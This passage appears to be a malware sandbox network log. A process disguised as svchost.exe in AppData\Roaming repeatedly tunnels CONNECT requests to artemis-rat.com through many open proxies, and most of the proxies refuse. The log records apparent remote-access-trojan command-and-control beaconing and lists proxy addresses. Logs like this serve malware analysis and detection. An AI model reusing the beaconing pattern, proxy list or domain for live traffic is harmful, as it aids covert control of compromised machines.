Mar 9, 2024 13:14:27.635349989 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1814	192.168.2.5	55322	94.131.63.120	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.483438969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.703952074 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1815	192.168.2.5	55362	185.162.228.154	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.484935999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.639235973 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1816	192.168.2.5	55369	104.25.64.27	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.498620033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.653151035 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1817	192.168.2.5	55380	104.22.50.220	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.514285088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.668457031 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1818	192.168.2.5	55366	184.170.248.5	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.572017908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1819	192.168.2.5	55412	154.208.10.126	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.583340883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.744266033 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.23.1 Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1820	192.168.2.5	55370	184.170.245.148	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.584147930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1821	192.168.2.5	55378	50.63.12.101	2953	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.598526001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1822	192.168.2.5	55309	119.3.215.41	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.601994038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1823	192.168.2.5	55379	24.249.199.12	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.615999937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1824	192.168.2.5	55457	172.67.38.96	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.631536007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.785902023 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1825	192.168.2.5	55337	61.129.2.212	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.631548882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.180006981 CET	59	IN	HTTP/1.1 200 Connection Established Proxy-agent: nginx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1826	192.168.2.5	55356	196.20.125.149	8083	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.631611109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1827	192.168.2.5	55453	142.54.239.1	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.651806116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1828	192.168.2.5	55504	172.67.181.197	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.677484989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.832470894 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1829	192.168.2.5	55480	198.12.255.193	6821	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.702227116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.270761967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.974039078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.380471945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.964801073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.974226952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1830	192.168.2.5	55536	172.67.255.224	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.712570906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.868083954 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1831	192.168.2.5	55391	43.131.248.165	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.714965105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1832	192.168.2.5	55513	162.214.227.68	60433	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.715826988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.270677090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.871222019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.064063072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.380624056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.771055937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.117486954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1833	192.168.2.5	55518	104.37.135.145	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.721666098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1834	192.168.2.5	55411	31.207.38.66	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:27.737663031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
